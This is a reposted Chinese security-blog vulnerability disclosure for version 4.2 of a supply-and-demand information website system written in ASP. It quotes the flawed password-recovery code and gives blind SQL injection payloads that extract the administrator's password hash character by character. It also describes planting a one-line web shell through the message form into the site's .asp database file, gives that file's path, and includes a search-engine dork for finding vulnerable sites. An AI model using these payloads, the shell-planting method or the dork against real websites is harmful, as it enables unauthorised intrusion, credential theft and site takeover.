热门关键字:   漏洞发布 网站安全 网络攻击 高级编辑 无限安全 云安全

天天供求信息网站管理系统4.20day

发布时间:2018-11-02 11:41文章来源:未知文章作者: 点击次数:
摘要:天天供求信息网站管理系统4.2 0day研究分析

发布时间:2009-11-4

影响版本:天天供求信息网站管理系统4.2

漏洞描述:

转载请注明:んㄗ葑訫鎖愛'S Blog http://www.virusest.com/

一,getpwd2.asp
<%response.buffer="True"
dim rs,sql,user,username
dim problem,id
username=request.form("username")
problem=request.form("problem")
dim connuser,password
sql="select * from [ttdv_user] where username='"&UserName&"'"
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
session("gpw_error")=session("gpw_error")+1
if rs.eof then response.write "


  ·你提交的信息不正确,无法找回密码!"
%>
可以看出对username为过滤,利用方法和网趣购物商城的那个洞一样。

 

漏洞测试:
' or (select count(*) from ttdv_admin where id=55 and asc(mid(password,1,1)) between 48 and 57)<>0 and ''=' //判断密码第一位是否是数字,如果是,依次改变数字范围,确定密码MD5值(0-9对应48-57)

' or (select count(*) from ttdv_admin where id=55 and asc(mid(password,1,1)) between 97 and 122)<>0 and ''=' //判断密码第一位是否是字母,如果是,同上。
提交注入语句:如图

 

正确则返回下一步,如图:


否则返回错误信息,如图:


但是这个利用起来比较慢,32位的密码,得猜半天。看第二个洞:


二,数据库未作处理,可以插入一句话。这里一句话不用加密,直接留言提交就行。因为他的防注入只防request.querystring。
数据库地址:\data\%23data%23.asp.但是在测试的时候数据库连接很慢,我等了半天才显示出数据库。


Google:inurl:onews.asp?catid
 

上一篇:Windows Media Player Plugin: Local File Detection Vulnerabil
下一篇:SupeSite社区本户跨站漏洞